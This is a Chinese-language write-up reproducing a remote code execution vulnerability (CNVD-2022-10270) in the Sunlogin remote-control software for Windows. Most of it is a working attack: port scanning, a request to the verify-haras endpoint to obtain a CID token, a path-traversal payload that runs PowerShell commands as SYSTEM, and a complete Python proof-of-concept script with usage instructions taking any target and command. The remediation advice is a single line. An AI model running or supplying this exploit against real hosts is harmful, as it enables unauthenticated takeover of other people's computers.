复现向日葵远程代码执行漏洞(CNVD-2022-10270 / CNVD-2022-03672)
警告
请勿使用本文提到的内容违反法律。
本文不提供任何担保。
漏洞描述
向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。CNVD披露了Oray旗下向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270 / CNVD-2022-03672),影响Windows系统中的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。目前已发现有漏洞利用演示视频公开,请相关用户尽快采取措施进行防护。
影响版本
向日葵个人版for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12)
漏洞复现
一、手工复现
1、端口扫描
nmap对目标主机进行全端口扫描:nmap -sS -p- 192.168.200.135
由于nmap的全端口扫描很慢(没使用多线程),作者自己写了个端口扫描,扫描结果如下:
2、确定向日葵的可疑端口
经过查阅发现,该版本的向日葵开启了不常用的端口(40000-50000)之间,根据这一解释,不难发现扫描结果中的 192.168.200.135:49678 的可疑存在。
浏览器访问:curl 192.168.200.135:49678
抓包得到:{"success":false,"msg":"Verification failure"}
3、获取验证码
访问地址:http://192.168.200.135:49678/cgi-bin/rpc?action=verify-haras
抓包得到:{"__code":0,"enabled":"1","verify_string":"9VIoJqZNnRo0eCnhJ6xg7U4j0uU16YRP","code":0}
验证码为:9VIoJqZNnRo0eCnhJ6xg7U4j0uU16YRP
4、构造 payload 并发送请求
访问地址:http://192.168.200.135:49678/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami 加上cookie:CID=9VIoJqZNnRo0eCnhJ6xg7U4j0uU16YRP 抓包得到:nt authority\syste
二、脚本复现
import requests,sys
ip = sys.argv[1]
command = sys.argv[2]
payload1 = "/cgi-bin/rpc?action=verify-haras"
payload2 = "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+"
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'
}
if "http://" not in ip:
host = "http://" + ip
else:
host = ip
try:
s = requests.Session()
res = s.get(url=host + payload1,headers=headers)
if res.status_code == 200:
res = res.json()
Cid = res['verify_string']
headers.update({'Cookie':"CID=" + Cid})
res1 = s.get(url=host + payload2 + command,headers=headers)
res1.encoding = "GBK"
print(res1.text)
else:
pass
except Exception as e:
print(e)
使用方法:python3 sunrce.py 目标ip:端口 "命令"
作者重写了该poc,运行效果如下图:
修复建议
更新向日葵版本
